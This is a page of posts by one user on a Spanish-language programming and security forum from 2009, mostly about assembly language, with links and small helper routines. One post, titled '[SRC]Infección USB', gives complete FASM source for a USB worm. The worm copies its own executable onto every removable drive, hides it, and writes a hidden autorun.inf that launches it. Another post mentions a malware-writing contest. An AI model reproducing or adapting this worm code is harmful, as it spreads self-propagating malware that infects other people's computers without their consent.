últimos mensajes de: YST

Mostrar Mensajes
Páginas: 1 ... 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 [50] 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 ... 68

491	Programación / ASM / Re: Programación en lenguaje ensamblador	en: 24 Mayo 2009, 19:29 pm
Cita de: APOKLIPTICO en 22 Mayo 2009, 16:21 pm una pequeña correccion, se te quedo afuera el ")" en el link Arreglado

492	Programación / ASM / Re: Errores de compilación de pasar de intel a AT&T	en: 24 Mayo 2009, 18:53 pm
Una correción ortografica a arkangel es EIP ( IP ) no EPI

493	Seguridad Informática / Abril negro / Re: [Abril Negro 2009] Encuesta del concurso de desarrollo de malware	en: 24 Mayo 2009, 08:08 am
Cita de: mrscript en 22 Mayo 2009, 03:31 am lee las normas generales del foro y de cualquier otra comunidad No letras rojas, no mayusculas (Hace ver que estas gritando) Lee tu las normas , se puede poner texto en color rojo mientras no sea todo el post ya que si no se pudiera tu crees que estarian esos botones ???

494	Programación / ASM / Re: Programación en lenguaje ensamblador	en: 24 Mayo 2009, 05:16 am
Yo se hacer macros , que necesitas ? , tambien en el subforo de macros de fasm hay varias

495

Programación / ASM / SRCs de YST.

en: 21 Mayo 2009, 08:40 am

Debido a un problema que me surgio necesite hacer una función que obtenga la extension real de un archivo , se las dejo por si le sirve a alguien.

Código

include 'win32ax.inc'
.code
start:
stdcall DetectaExtención,"SoyUnExe.php.exe.YoSoyLaextensionreal"
invoke MessageBox,0,eax,0,0
invoke ExitProcess,0
;Descripcion: Esta función devuelve la extension de un archivo
; cRuta = Ruta del archivo
; by YST
proc DetectaExtención,cRuta
push ebx esi
xchg eax,[cRuta]
dec eax
.bucle:
inc eax
cmp byte[eax],0
jne .bucle
inc eax
.bucle2:
dec eax
cmp byte[eax],"."
jne .bucle2
xor esi,esi
dec esi
.bucle3:
inc eax
inc esi
cmp byte[eax],0
jne .bucle3
push eax
invoke GlobalAlloc,GPTR,esi
xchg ebx,eax
pop eax
sub eax,esi
stdcall cRtlMoveMemory,ebx,eax,esi
xchg ebx,eax
.salir:
pop  esi ebx
ret
endp
;Descripcion: Esta función funciona igual que la winapi RtlMoveMemory
; by YST
proc cRtlMoveMemory,cBuffer,Cpuntero,cCantidad
push esi edi
xchg edi,[cBuffer]
xchg esi,[Cpuntero]
.bucleb:
dec [cCantidad]
movsb
cmp  [cCantidad],0
jge .bucleb
pop edi esi
ret
endp
.end start

496	Programación / Ingeniería Inversa / Re: Inocent Crackme [By Invisible_Hack]	en: 20 Mayo 2009, 23:38 pm
Podrias ofuscar un poco para que no sea un simple if

497	Programación / ASM / Programación en lenguaje ensamblador	en: 20 Mayo 2009, 21:35 pm
Ensambladores FASM -> http://flatassembler.net/download.php NASM -> http://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D MASM -> http://www.masm32.com/masmdl.htm Documentación Manuales ASM Iczelion's tutorial http://win32assembly.online.fr/files/tut_es.zip Programación avanzada en Lenguaje Ensamblador http://www.ramonmedina.name/files/universidad/ac/ac0001.PDF EL UNIVERSO DIGITAL DEL IBM PC, AT Y PS/2 http://atc.ugr.es/docencia/udigital/ documentation for 8086 assembler and emulator(ingles) http://www.emu8086.com/assembly_language_tutorial_assembler_reference/ Los registros http://www.monografias.com/trabajos7/regi/regi.shtml http://es.wikipedia.org/wiki/Registro_(hardware) Documentación sys calls(linux) http://sourceforge.net/project/downloading.php?group_id=173983&filename=lscr-160307.tar.gz&a=60287788

498	Programación / ASM / Re: Duda ASM	en: 20 Mayo 2009, 21:02 pm
No pasa nada con un bucle infinito , no le pasa nada a la ram

499	Programación / ASM / Re: Duda ASM	en: 20 Mayo 2009, 20:45 pm
No hay ningun peligro por que sea un lenguaje de mas bajo nivel.

500

Programación / ASM / [SRC]Infección USB

en: 20 Mayo 2009, 19:07 pm

Esta en fasm para llamarlo se llama con

Código:

invoke CreateThread , 0, 0,InfeccionUSB,0,0 , 0

Código

     Autorun db '[autoRun]',13,10,\
'action=Open Files On Folder',13,10,\
'shellexecute=',0
Autorun2 db 13,10,\
'UseAutoPlay=1',0  
BufferUnidades rb 31

Código

proc InfeccionUSB
locals
Miruta dd ?
Minombre dd ?
MiRutaInfeccionaria dd ?
MiAutorun dd ?
RutaAutorun dd ?
handleCreado dd ?
tamaño dd ?
bEscritos dd ?
endl
pushad
 
invoke GlobalAlloc,GPTR,MAX_PATH
  mov [Miruta],eax
invoke GetModuleFileNameA,0,[Miruta],MAX_PATH
  stdcall ConseguirNombre,[Miruta]
  mov [Minombre],eax
       .infinito:
    invoke SleepEx,1000,FALSE
       stdcall Zerar,BufferUnidades,30
invoke GetLogicalDriveStringsA,30,BufferUnidades
        mov ebx,BufferUnidades
        .bucleDetectaExtraible:
invoke GetDriveTypeA,ebx
 
.if eax = DRIVE_REMOVABLE
.if word[ebx] = 'A:'
.else
      invoke GlobalAlloc,GPTR,MAX_PATH
mov [MiRutaInfeccionaria],eax
           stdcall Concat,ebx,[Minombre],[MiRutaInfeccionaria]
 
     ;       stdcall LLamaOtraApi,'shlwapi.dll', "PathFileExistsA"
invoke PathFileExistsA,[MiRutaInfeccionaria]
.if eax = FALSE
 
invoke CopyFileA,[Miruta],[MiRutaInfeccionaria],FALSE
                ;SetFileAttributes
          invoke SetFileAttributesA,[MiRutaInfeccionaria],FILE_ATTRIBUTE_HIDDEN
              invoke GlobalAlloc,GPTR,MAX_PATH
              mov [MiAutorun] ,eax
            invoke GlobalAlloc,GPTR,MAX_PATH
            mov [RutaAutorun],eax
              stdcall Concat,Autorun,[Minombre], [MiAutorun]
                    stdcall Concat,[MiAutorun],Autorun2, [MiAutorun]
                    stdcall Concat,ebx,"autorun.inf",[RutaAutorun]
 
            invoke CreateFileA, [RutaAutorun] , GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0
                mov [handleCreado], eax
            invoke lstrlenA,[MiAutorun]
              mov [tamaño],eax
      invoke WriteFile, [handleCreado],[MiAutorun] , [tamaño], addr bEscritos, NULL
 
 
            invoke CloseHandle, [handleCreado]
               invoke SetFileAttributesA,[RutaAutorun] ,FILE_ATTRIBUTE_HIDDEN
invoke GlobalFree,[MiAutorun]
 
invoke GlobalFree,[RutaAutorun]
                .endif
invoke GlobalFree,[MiRutaInfeccionaria]
.endif
.endif
 
.if byte[ebx] = 0
 
 invoke GlobalFree,[Miruta]
invoke CreateThread , 0, 0,InfeccionUSB,0,0 , 0
invoke ExitThread,0
.else
add ebx,4
jmp      .bucleDetectaExtraible
.endif
 endp

Código

 proc Concat uses esi edi, @AdrSrc1, @AdrSrc2, @AdrDest
    mov esi,[@AdrSrc1]
    mov edi,[@AdrDest]
 
 .concat_src1:
    movsb
    cmp byte[esi],0
    jne .concat_src1
 
    mov esi,[@AdrSrc2]
 
 .concat_src2:
    movsb
    cmp byte[esi],0
    jne .concat_src2
 
    movsb
 
    ret
endp
 
 proc ConseguirNombre,ruta ;Funcion que devuelve el nombrer de el archivo.
push ebx
xor ebx,ebx
mov ebx,[ruta]
stdcall len,[ruta]
add ebx,eax
@@:
dec ebx
cmp byte[ebx],5Ch
jne @b
inc ebx
mov eax,ebx
pop ebx
ret
endp  
 
 proc Zerar,Puntero,Cantidad
 
    push ecx
    push ebx
 
              mov ecx,[Cantidad]
                 mov ebx,[Puntero]
                .bucle:
 
                mov byte[ebx+ecx],0
                loop .bucle
                mov byte[ebx],0
                pop ebx
                pop ecx
                ret
endp

Páginas: 1 ... 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 [50] 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 ... 68